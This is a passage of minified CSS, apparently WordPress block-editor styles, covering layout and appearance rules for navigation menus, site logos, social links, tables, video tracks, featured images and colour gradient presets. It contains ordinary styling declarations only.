.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{ display:none; } .wp-block-navigation-placeholder__preview{ background:#0000; color:currentColor; } .wp-block-navigation-placeholder__preview:before{ border:1px dashed; border-radius:inherit; bottom:0; content:""; display:block; left:0; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview>svg{ fill:currentColor; } .wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{ min-height:90px; } .wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{ min-height:132px; } .wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{ align-items:flex-start; flex-direction:row; padding:6px 8px; } .wp-block-navigation-placeholder__controls{ background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; display:none; position:relative; z-index:1; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{ display:flex; } .wp-block-navigation-placeholder__controls{ float:right; width:100%; } .is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{ display:none; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{ align-items:flex-start; flex-direction:column; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{ display:none; } .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{ height:36px; margin-left:12px; } .wp-block-navigation-placeholder__actions__indicator{ align-items:center; display:flex; height:36px; justify-content:flex-start; line-height:0; margin-right:4px; padding:0 0 0 6px; } .wp-block-navigation-placeholder__actions__indicator svg{ margin-left:4px; fill:currentColor; } .wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{ flex-direction:row !important; } .wp-block-navigation-placeholder__actions{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; gap:6px; } .wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{ margin-left:0; } .wp-block-navigation-placeholder__actions{ height:100%; } .wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{ background-color:#1e1e1e; border:0; height:100%; margin:auto 0; max-height:16px; min-height:1px; min-width:1px; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{ display:none; } } .wp-block-navigation__responsive-container.is-menu-open{ position:fixed; top:159px; } @media (min-width:782px){ .wp-block-navigation__responsive-container.is-menu-open{ right:36px; top:97px; } } @media (min-width:960px){ .wp-block-navigation__responsive-container.is-menu-open{ right:160px; } } .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:145px; } .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ right:0; top:159px; } @media (min-width:782px){ .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ top:65px; } } .is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:113px; } body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{ bottom:0; left:0; right:0; top:0; } .components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ color:inherit; height:auto; padding:0; } .components-heading.wp-block-navigation-off-canvas-editor__title{ margin:0; } .wp-block-navigation-off-canvas-editor__header{ margin-bottom:8px; } .is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{ margin-top:16px; } @keyframes fadein{ 0%{ opacity:0; } to{ opacity:1; } } .wp-block-navigation__loading-indicator-container{ padding:8px 12px; } .wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{ margin-top:0; } @keyframes fadeouthalf{ 0%{ opacity:1; } to{ opacity:.5; } } .wp-block-navigation-delete-menu-button{ justify-content:center; margin-bottom:16px; width:100%; } .components-button.is-link.wp-block-navigation-manage-menus-button{ margin-bottom:16px; } .wp-block-navigation__overlay-menu-preview{ align-items:center; background-color:#f0f0f0; display:flex; grid-column:span 2; height:64px !important; justify-content:space-between; padding:0 24px; width:100%; } .wp-block-navigation__overlay-menu-preview.open{ background-color:#fff; box-shadow:inset 0 0 0 1px #e0e0e0; outline:1px solid #0000; } .wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{ display:none; } .wp-block-navigation__navigation-selector{ margin-bottom:16px; width:100%; } .wp-block-navigation__navigation-selector-button{ border:1px solid; justify-content:space-between; width:100%; } .wp-block-navigation__navigation-selector-button__icon{ flex:0 0 auto; } .wp-block-navigation__navigation-selector-button__label{ flex:0 1 auto; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .wp-block-navigation__navigation-selector-button--createnew{ border:1px solid; margin-bottom:16px; width:100%; } .wp-block-navigation__responsive-container-open.components-button{ opacity:1; } .wp-block-navigation__menu-inspector-controls{ overflow-x:auto; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{ background-color:initial; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{ scrollbar-color:#949494 #0000; } .wp-block-navigation__menu-inspector-controls{ will-change:transform; } @media (hover:none){ .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#949494 #0000; } } .wp-block-navigation__menu-inspector-controls__empty-message{ margin-right:24px; } .editor-sidebar__panel .wp-block-navigation__submenu-header{ margin-bottom:0; margin-top:0; } .wp-block-navigation__submenu-accessibility-notice{ grid-column:span 2; } .wp-block-navigation .block-list-appender{ position:relative; } .wp-block-navigation .has-child{ cursor:pointer; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{ z-index:29; } .wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; overflow:visible !important; visibility:visible !important; width:auto !important; } .wp-block-navigation-item .wp-block-navigation-item__content{ cursor:text; } .wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{ min-width:20px; } .wp-block-navigation-item .block-list-appender{ margin:16px 16px 16px auto; } .wp-block-navigation-link__invalid-item{ color:#000; } .wp-block-navigation-link__placeholder{ background-image:none !important; box-shadow:none !important; position:relative; text-decoration:none !important; } .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ -webkit-text-decoration:wavy underline; text-decoration:wavy underline; -webkit-text-decoration-skip-ink:none; text-decoration-skip-ink:none; text-underline-offset:.25rem; } .wp-block-navigation-link__placeholder.wp-block-navigation-item__content{ cursor:pointer; } .link-control-transform{ border-top:1px solid #ccc; padding:0 16px 8px; } .link-control-transform__subheading{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .link-control-transform__items{ display:flex; justify-content:space-between; } .link-control-transform__item{ flex-basis:33%; flex-direction:column; gap:8px; height:auto; } .link-ui-page-creator{ max-width:350px; min-width:auto; padding-top:8px; width:90vw; } .link-ui-page-creator__inner{ padding:16px; } .link-ui-page-creator__back{ margin-right:8px; text-transform:uppercase; } .navigation-link-control__error-text{ color:#cc1818; } .wp-block-navigation-submenu{ display:block; } .wp-block-navigation-submenu .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; position:absolute; right:-1px; top:100%; visibility:visible !important; width:auto !important; } @media (min-width:782px){ .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:-1px; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:#0000; content:""; display:block; height:100%; left:100%; position:absolute; width:.5em; } } .block-editor-block-list__block[data-type="core/nextpage"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-nextpage{ display:block; text-align:center; white-space:nowrap; } .wp-block-nextpage>span{ background:#fff; border-radius:4px; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; padding:6px 8px; position:relative; text-transform:uppercase; } .wp-block-nextpage:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; } .wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{ display:contents; flex:1; } .wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{ flex:inherit; } .wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{ display:block; } .wp-block-pages-list__item__link{ pointer-events:none; } @media (min-width:600px){ .wp-block-page-list-modal{ max-width:480px; } } .wp-block-page-list-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; visibility:visible; width:auto; } .wp-block-page-list__loading-indicator-container{ padding:8px 12px; } .block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{ min-height:auto !important; } .block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{ opacity:1; } .block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{ opacity:0; } .block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; } .is-zoomed-out .block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{ opacity:0; } .wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{ display:inline; } .wp-block-pullquote.is-style-solid-color blockquote p{ font-size:32px; } .wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{ font-style:normal; text-transform:none; } .wp-block-pullquote__citation{ color:inherit; } .wp-block-rss li a>div{ display:inline; } .wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{ flex:1 1 auto; } .wp-block-rss .wp-block-rss{ all:inherit; margin:0; padding:0; } .wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search :where(.wp-block-search__button){ align-items:center; border-radius:initial; display:flex; height:auto; justify-content:center; text-align:center; } .wp-block-search__inspector-controls .components-base-control{ margin-bottom:0; } .block-editor-block-list__block[data-type="core/separator"]{ padding-bottom:.1px; padding-top:.1px; } .blocks-shortcode__textarea{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; resize:none; } @media (min-width:600px){ .blocks-shortcode__textarea{ font-size:13px !important; } } .blocks-shortcode__textarea:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid #0000 !important; } .wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{ display:table; margin-left:auto; margin-right:auto; } .wp-block-site-logo a{ pointer-events:none; } .wp-block-site-logo .custom-logo-link{ cursor:inherit; } .wp-block-site-logo .custom-logo-link:focus{ box-shadow:none; } .wp-block-site-logo img{ display:block; height:auto; max-width:100%; } .wp-block-site-logo.is-transient{ position:relative; } .wp-block-site-logo.is-transient img{ opacity:.3; } .wp-block-site-logo.is-transient .components-spinner{ margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); } .wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{ height:60px; width:60px; } .wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{ border-radius:inherit; } .wp-block-site-logo.wp-block-site-logo .components-placeholder{ align-items:center; border-radius:inherit; display:flex; height:100%; justify-content:center; min-height:48px; min-width:48px; padding:0; width:100%; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{ display:none; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; margin:auto; padding:0; position:relative; width:48px; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{ color:inherit; } .block-library-site-logo__inspector-media-replace-container{ position:relative; } .block-library-site-logo__inspector-media-replace-container .components-drop-zone__content-icon{ display:none; } .block-library-site-logo__inspector-media-replace-container button.components-button{ box-shadow:inset 0 0 0 1px #ccc; color:#1e1e1e; display:block; height:40px; width:100%; } .block-library-site-logo__inspector-media-replace-container button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-library-site-logo__inspector-media-replace-container .components-dropdown{ display:block; } .block-library-site-logo__inspector-media-replace-container img{ aspect-ratio:1; border-radius:50% !important; box-shadow:inset 0 0 0 1px #0003; min-width:20px; width:20px; } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{ display:flex; height:40px; padding:6px 12px; } .wp-block-site-tagline__placeholder,.wp-block-site-title__placeholder{ border:1px dashed; padding:1em 0; } .wp-block-social-links .wp-social-link{ line-height:0; } .wp-block-social-link-anchor{ align-items:center; background:none; border:0; box-sizing:border-box; color:currentColor; cursor:pointer; display:inline-flex; font-family:inherit; font-size:inherit; font-weight:inherit; height:auto; margin:0; opacity:1; padding:.25em; } .wp-block-social-link-anchor:hover{ transform:none; } :root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){ padding-left:.6666666667em; padding-right:.6666666667em; } :root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){ padding:0; } .wp-block-social-link__toolbar_content_text{ width:250px; } .wp-block-social-links div.block-editor-url-input{ display:inline-block; margin-right:8px; } .wp-social-link:hover{ transform:none; } :root :where(.wp-block-social-links){ padding:0; } .wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{ justify-content:center; } .block-editor-block-preview__content .components-button:disabled{ opacity:1; } .wp-social-link.wp-social-link__is-incomplete{ opacity:.5; } .wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{ opacity:1; } .wp-block-social-links .block-list-appender{ position:static; } .wp-block-social-links .block-list-appender .block-editor-inserter{ font-size:inherit; } .wp-block-social-links .block-list-appender .block-editor-button-block-appender{ font-size:inherit; height:1.5em; padding:0; width:1.5em; } .block-editor-block-list__block[data-type="core/spacer"]:before{ content:""; display:block; height:100%; min-height:8px; min-width:8px; position:absolute; width:100%; z-index:1; } .block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{ background:#0000001a; } .is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{ background:#ffffff26; } .block-library-spacer__resize-container{ clear:both; } .block-library-spacer__resize-container:not(.is-resizing){ height:100% !important; width:100% !important; } .block-library-spacer__resize-container .components-resizable-box__handle:before{ content:none; } .block-library-spacer__resize-container.resize-horizontal{ height:100% !important; margin-bottom:0; } .wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{ height:auto; } .wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{ width:auto; } .wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{ word-break:break-word; } .wp-block[data-align=center]>.wp-block-table{ text-align:initial; } .wp-block[data-align=center]>.wp-block-table table{ margin:0 auto; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table td.is-selected,.wp-block-table th.is-selected{ border-color:var(--wp-admin-theme-color); border-style:double; box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{ border:1px solid; } .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-start; display:flex; flex-direction:column; gap:8px; } @media (min-width:782px){ .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-end; flex-direction:row; } } .blocks-table__placeholder-input{ width:112px; } .wp-block-tag-cloud .wp-block-tag-cloud{ border:none; border-radius:inherit; margin:0; padding:0; } .block-editor-template-part__selection-modal{ z-index:1000001; } .block-editor-template-part__selection-modal .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:1280px){ .block-editor-template-part__selection-modal .block-editor-block-patterns-list{ column-count:3; } } .block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .block-library-template-part__selection-search{ background:#fff; padding:16px 0; position:sticky; top:0; z-index:2; } .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{ outline-color:var(--wp-block-synced-color); } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{ border:none; } .wp-block-term-template .term-loading .term-loading-placeholder{ background-color:#f0f0f0; border-radius:2px; height:1.5em; margin-bottom:.25em; width:100%; } @media not (prefers-reduced-motion){ .wp-block-term-template .term-loading .term-loading-placeholder{ animation:loadingpulse 1.5s ease-in-out infinite; } } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:.5; } to{ opacity:1; } } .wp-block-text-columns .block-editor-rich-text__editable:focus{ outline:1px solid #ddd; } .wp-block[data-align=center]>.wp-block-video{ text-align:center; } .wp-block-video{ position:relative; } .wp-block-video.is-transient video{ opacity:.3; } .wp-block-video .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .block-library-video-tracks-editor{ z-index:159990; } .block-library-video-tracks-editor__track-list-track{ padding-right:12px; } .block-library-video-tracks-editor__single-track-editor-kind-select{ max-width:240px; } .block-library-video-tracks-editor__single-track-editor-edit-track-label,.block-library-video-tracks-editor__tracks-informative-message-title{ color:#757575; display:block; font-size:11px; font-weight:500; margin-top:4px; text-transform:uppercase; } .block-library-video-tracks-editor>.components-popover__content{ width:360px; } .block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{ padding:0; } .block-library-video-tracks-editor__tracks-informative-message{ padding:8px; } .block-library-video-tracks-editor__tracks-informative-message-description{ margin-bottom:0; } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:1280px){ .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:3; } } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{ background:#fff; margin-bottom:-4px; padding:16px 0; position:sticky; top:0; transform:translateY(-4px); z-index:2; } @media (min-width:600px){ .wp-block-query__enhanced-pagination-modal{ max-width:480px; } } .block-editor-block-settings-menu__popover.is-expanded{ overflow-y:scroll; } .block-editor-block-settings-menu__popover .block-library-query-pattern__selection-content{ height:100%; } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr; } @media (min-width:600px){ .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ grid-template-columns:1fr 1fr; } } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ grid-gap:12px; min-width:280px; } @media (min-width:600px){ .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ min-width:480px; } } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .wp-block-query>.block-editor-media-placeholder.is-small{ min-height:60px; } .wp-block[data-align=center]>.wp-block-query-pagination{ justify-content:center; } :where(.editor-styles-wrapper) .wp-block-query-pagination{ max-width:100%; } :where(.editor-styles-wrapper) .wp-block-query-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-query-pagination-numbers a{ text-decoration:underline; } .wp-block-query-pagination-numbers .page-numbers{ margin-left:2px; } .wp-block-query-pagination-numbers .page-numbers:last-child{ margin-right:0; } .wp-block-post-featured-image .block-editor-media-placeholder{ backdrop-filter:none; z-index:1; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ align-items:center; display:flex; justify-content:center; padding:0; } .wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{ display:none; } .wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; margin:auto; padding:0; position:relative; width:48px; } .wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{ color:inherit; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ min-height:200px; } .wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){ border-right-style:solid; } .wp-block-post-featured-image[style*=height] .components-placeholder{ height:100%; min-height:48px; min-width:48px; width:100%; } .wp-block-post-featured-image>a{ pointer-events:none; } .wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{ opacity:1; pointer-events:auto; } .wp-block-post-featured-image.is-transient{ position:relative; } .wp-block-post-featured-image.is-transient img{ opacity:.3; } .wp-block-post-featured-image.is-transient .components-spinner{ position:absolute; right:50%; top:50%; transform:translate(50%, -50%); } div[data-type="core/post-featured-image"] img{ display:block; height:auto; max-width:100%; } .wp-block-post-comments-form *{ pointer-events:none; } .wp-block-post-comments-form .block-editor-warning *{ pointer-events:auto; } .wp-element-button{ cursor:revert; } .wp-element-button[role=textbox]{ cursor:text; } .block-library-poster-image__container{ position:relative; } .block-library-poster-image__container:focus .block-library-poster-image__actions,.block-library-poster-image__container:focus-within .block-library-poster-image__actions,.block-library-poster-image__container:hover .block-library-poster-image__actions{ opacity:1; } .block-library-poster-image__container .block-library-poster-image__actions.block-library-poster-image__actions-select{ margin-top:16px; opacity:1; } .block-library-poster-image__container .components-drop-zone__content{ border-radius:2px; } .block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner{ align-items:center; display:flex; gap:8px; } .block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{ margin:0; } .block-library-poster-image__container .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .block-library-poster-image__preview{ display:flex; height:auto !important; justify-content:center; min-height:40px; outline:1px solid #0000001a; outline-offset:-1px; overflow:hidden; padding:0; width:100%; } .block-library-poster-image__preview .block-library-poster-image__preview-image{ aspect-ratio:2/1; object-fit:cover; object-position:50% 50%; width:100%; } .block-library-poster-image__actions:not(.block-library-poster-image__actions-select){ bottom:0; opacity:0; padding:8px; position:absolute; } @media not (prefers-reduced-motion){ .block-library-poster-image__actions:not(.block-library-poster-image__actions-select){ transition:opacity 50ms ease-out; } } .block-library-poster-image__actions:not(.block-library-poster-image__actions-select) .block-library-poster-image__action{ backdrop-filter:blur(16px) saturate(180%); background:#ffffffbf; } .block-library-poster-image__actions .block-library-poster-image__action{ flex-grow:1; justify-content:center; } :root .editor-styles-wrapper .has-very-light-gray-background-color{ background-color:#eee; } :root .editor-styles-wrapper .has-very-dark-gray-background-color{ background-color:#313131; } :root .editor-styles-wrapper .has-very-light-gray-color{ color:#eee; } :root .editor-styles-wrapper .has-very-dark-gray-color{ color:#313131; } :root .editor-styles-wrapper .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(-135deg, #00d084, #0693e3); } :root .editor-styles-wrapper .has-purple-crush-gradient-background{ background:linear-gradient(-135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .editor-styles-wrapper .has-hazy-dawn-gradient-background{ background:linear-gradient(-135deg, #faaca8, #dad0ec); } :root .editor-styles-wrapper .has-subdued-olive-gradient-background{ background:linear-gradient(-135deg, #fafae1, #67a671); } :root .editor-styles-wrapper .has-atomic-cream-gradient-background{ background:linear-gradient(-135deg, #fdd79a, 